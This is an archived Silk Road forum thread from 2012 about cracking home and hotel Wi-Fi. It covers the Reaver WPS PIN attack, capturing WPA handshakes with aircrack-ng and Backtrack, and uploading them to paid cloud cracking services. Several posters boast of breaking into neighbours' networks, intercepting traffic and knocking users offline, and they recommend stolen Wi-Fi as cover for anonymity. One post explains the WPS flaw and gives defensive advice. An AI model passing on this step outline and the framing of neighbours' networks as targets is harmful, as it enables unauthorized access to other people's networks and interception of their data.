Silk Road forums
Discussion => Security => Topic started by: novocaine on February 18, 2012, 07:42 am
-
This has is giving the nerd in me a big hard on..
I want one... NOW
Not only will it crack wpa/wpa2... it will crash a network intermittently as it is doing it 8)
apparently
Anyone use the pro or the open source version yet?
http://www.tacnetsol.com/products/
Reaver is a WPA attack tool developed by Tactical Network Solutions that exploits a protocol design flaw in WiFi Protected Setup (WPS). This vulnerability exposes a side-channel attack against Wi-Fi Protected Access (WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network. With a well-chosen PSK, the WPA and WPA2 security protocols are assumed to be secure by a majority of the 802.11 security community.
WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point's PIN and then extract the PSK and give it to the attacker.
Current attacks against WPA networks involve the computation of rainbow tables based on a dictionary of potential keys and the name (SSID) of the network being attacked. Rainbow tables must be re-generated for each network encountered and are only successful if the PSK is a dictionary word. However, Reaver is not restricted by the limitations of traditional dictionary-based attacks. Reaver is able to extract the WPA PSK from the access point within 4 - 10 hours and roughly 95% of modern consumer-grade access points ship with WPS enabled by default.
You can find the free, open source version of Reaver at Google Code
Tactical Network Solutions is now pleased to offer a commercial version of Reaver called Reaver Pro. Reaver Pro is a dedicated hardware solution that allows operators to effortlessly conduct WPS attacks via a graphcial web interface. The hardware is preconfigured and tested for field use, operators only have to plug it and start the attack. Simply connect a laptop to the ethernet port and open a web browser- you'll automatically be redirected to the Reaver Attack Interface.
Unfortunately, the first limited edition run of Reaver Pro is now sold out.
-
I don't see this as that special. Anyone with Linux/ubuntu can run a few commands to break into pretty much any wireless network.
I have my fun when I go to hotels and in neighborhoods with lots of connections. Cracking a connection takes about 10 minutes, and once you get in you can intercept any data that goes through it. This is why people say wireless is not secure. It's easy as fuck to crack.
Tutorials are all over youtube. Hacking Wireless with Ubuntu or linux
-
Tommyhawk, do you mean easy to hack wpa/wpa2 in 10min? Maybe you mean wep? Those are weak.
For wpa/wpa2 I heard Russians had a system using the gpu computational (CUDA) to brute force a password in 10min. I guess you're never safe using wifi.
Another method involves using "the cloud" to crack it. Upload the key to a server who brute force it. You pay depending on the time it takes.
Source:http://securecloudreview.com/2011/01/use-the-cloud-to-brute-force-wpa-passwords/
-
hey, I searched for some info on the CCS (cloud cracking suite) for cracking passwords using amazon servers, but it seems that all the info is from february 2011 and I can;t finde anything more recent.
The lasy post on the author's blog is from ferbuary 2011.
Do you know any other links where I can educate myself on this matter? :)
-
with 'the cloud' are they still brute forcing using dictionary words?
-
shit, i want one. how much are they going for? didnt see a price.
i know some of you guys know how to hack cable modems also. would pay for that information/knowledge!
-
The only way to break a WPA/WPA2 password is brute force -- you use a dictionary of words and start guessing. Rainbow tables only speed up the process, but the password still had to be in the dictionary to begin with.
Here's a cloud site that will crack for free:
http://wpa.darkircop.org/index.php?off=0
Note what they say about Rainbow tables -- it just speeds things up.
Think of it this way. Your wireless connection is broadcasting, just like a a radio station. With a radio, you can tune into a station. With computer software (and a wireless card), you can tune in to wireless internet traffic...and start recording. What are you listening for? A special communication between the PC and the router, called a handshake, which contains the PSK (technically, a 3 way handshake, but you don't care for this purpose of this exercise).
Great, now you have that handshake recorded. Your software that recorded it saved it as a PCAP file. That's the file those cracking sites want you to upload -- the PCAP file that contains the 3 way handshake.
Here's one that will do it for $25:
http://www.skidhacker.com/wpacrack
There were a few others, one that even took bitcoins.
Here's how to record the traffic:
1. Get backtrack (it's free, and legal -- http://www.backtrack-linux.org/downloads/)
2. Boot it. If it doesn't recognize your wireless card, buy the Alfa one off of Amazon for $30 (http://www.amazon.com/Alfa-802-11b-Wireless-Original-9dBi/dp/B001O9X9EU)
3. Client = Computer, Access Point = Router. Learn it. Know it. Live it.
3. Follow these directions: http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Yes, you can kick others off their connection. What you do is instead of just listening, you start broadcasting noise which interferes with their signal, or broadcast to the router (in their name) connection termination requests. Pretty lame if you ask me.
My point with all of this is that the software is garbage, and a ripoff. You need that handshake. If you have that....you're ready to rock. Just don't tell anyone you did it, because they'll call you a script kiddie (which you are, but everyone has to start somewhere. Don't stop there; the fun is really getting started. You'll lose a lot of hours to this if you're ambitious enough).
-
thanks unbiased, you have suckered me in even more;)
so this reaver thing.. saying it does not use the traditional dictionary crack but uses a different exploit similar to what you have shared about the handshake thing....is BS or what?
Im a fast learner, just not very quick today ;)
edit- I am watching that video on Hak5 about the reaver and it does not use the traditional offline brute force attack. It is an active attack that can be used as a DoS attack because it goes for the pin which resets most routers.. I have no idea if this is bs or not lol
www.tacnetsol.com/news/2012/2/8/reaver-on-hak5.html
-
Five days old article:
http://www.forbes.com/sites/andygreenberg/2012/02/14/moxie-marlinspikes-cloudcracker-aims-for-speedier-cheaper-password-cracking/
Cloudcracker:
https://cloudcracker.com/
-
Five days old article:
http://www.forbes.com/sites/andygreenberg/2012/02/14/moxie-marlinspikes-cloudcracker-aims-for-speedier-cheaper-password-cracking/
Cloudcracker:
https://cloudcracker.com/
Ha! I wondered what happened to wpacracker.com. An upgrade!
I don't know about hacking the router itself, but I don't think that would work. Let's say you could, but then what? You change the WPA password? I think the owners of the router would notice that they can't login anymore, and will just reset it. Give backtrack a whirl, it's free.
-
If you get the wpa password you don't have to change it. You've got access to an internet connection that is not yours. Professional hackers rent an apartment in a very populated area with as many wifi connections as possible. Hack one or few of them and have a decent connection that is not shared with dozens like a public wifi. In case it goes sour, they're ass is not on the line. WEP connections are preferred because they're easy to crack (10-20min).
-
This tool doesn't actually crack your PSK or anything like that. It's actually exploiting a known hole in the WPS (WiFi Protected Setup) "push button" setup feature on most access points and routers.
Wikipedia:
In December 2011 researcher Stefan Viehböck reported a design and implementation flaw that makes brute-force attacks against PIN-based WPS feasible to perform on WPS-enabled Wi-Fi networks. A successful attack on WPS allows unauthorized parties to gain access to the network. The only effective workaround is to disable WPS.[4]
The vulnerability centers around the acknowledgement messages sent between the registrar and enrollee when attempting to validate a PIN. The PIN, which is printed on the side of each WPS-enabled Wi-Fi router, is an eight digit number. Since the last digit is a checksum of the previous digits,[6] there are eight unknown digits in each PIN, yielding 108 = 100,000,000 possible combinations.
When an enrollee attempts to gain access using a PIN, the registrar reports the validity of the first and second halves of the PIN separately. Since the first half of the pin consists of four digits (10,000 possibilities) and second half has only three active digits (1000 possibilities), at most only 11,000 guesses are needed before the PIN is recovered. This is a reduction of three orders of magnitude from the number PINs that would have to be tested absent the design flaw. As a result, a practical attack can be completed in just a few hours. The ease or difficulty of exploiting this flaw is implementation dependent, as Wi-Fi router manufacturers could defend against such attacks by slowing or disabling the WPS feature after several failed PIN validation attempts.[3] Reaver test first all the common PIN's for the wifi, then it goes from 0000 to 9999, when it have found the first four digits it starts to bruteforce the other half. eg. Lets say it found 5423 as the first digits. Now it starts to test the other half, it starts with 54230000 then it goes to 54230001 and so on.
A tool has been developed in order to show the attack is practical.[7] The firm that released the tool, Tactical Network Solutions in Maryland, says that it has known about the vulnerability since early 2011 and has been using it.[8]
Methods for disabling WPS have been published for some models of the following brands;
Belkin[9]
D-Link[10]
Netgear[11]
TP-Link[12]
In some devices, notably those made by Linksys, disabling WPS in the user interface does not result in the feature actually being disabled. The device remains vulnerable to attack.[5]
Disable WPS on your router and apply the latest firmware update (especially if you have a linksys device) to remove this attack vector.
If your WPA2 PSK is 15+ characters of truly random data, I doubt anyone will be able to attack it directly. Might as well make it 20+ characters at that point so it's truly impractical to crack. Even then I wouldn't trust WiFi for truly sensitive operations, even on your local LAN. I'd either VPN locally (sounds paranoid but why not?) or just use good ol' ethernet when true security is required.
-
Thanks heaps ;)
So pretty much anyone with a default post 2008 wps router in my neighborhood better watch OUT!! :P 8)
Just a quick question because I am totally illiterate when it comes to this and I do not really know what questions to ask to find the answers but if somebody can just briefly answer...
If I am running Tor, for better anonymity... Ethernet or jacking someones wifi?
-
IMHO,
Even for wifi cracking you'll need proper equipment like a compatible network card and a decent antenna (you can buy it on ebay or Amazon for 20 bucks). There's plenty of information on specific forums. I think you should learn how to use Backtrack Linux. Google it.
Jacking someones wifi will give you another layer of defense in case shit hits the fan. And don't hack a wifi if it's only you and your neighbor.
-
Actually I read somewhere that like 50% of routers that you disabled WPS on, the function was still active. lol. And before you spend the 4-10 hrs cracking WPS, be sure to take the time and try all the default WPS codes like 01234567. I jumped for joy when I found out about WPS and reaver attacks.
---------------------------------------------------------------------------------
"Only to live, to live and live! Life, whatever it may be!"
-
How in today's high security requirements, open standards and open software such design flaw can occur?
The WPA2 + AES are still safe IMHO. But the WPS should be disabled on all devices.
-
Just an update.
The reaver pro is now available via hakshop
$99US or like $2.50aus :P
http://hakshop.myshopify.com/products/reaver-pro
-
Don't have to buy, lot's of tutorials to exploit WPS. As for WPA cracking simply use aircrack tools to capture the handshake and upload it to a password cracking service that you pay hourly to run on an Amazon GPU cluster instance to break the key
https://www.wpacracker.com/
-
which is ok if they have used a dictionary word? but who uses dictionary words these days.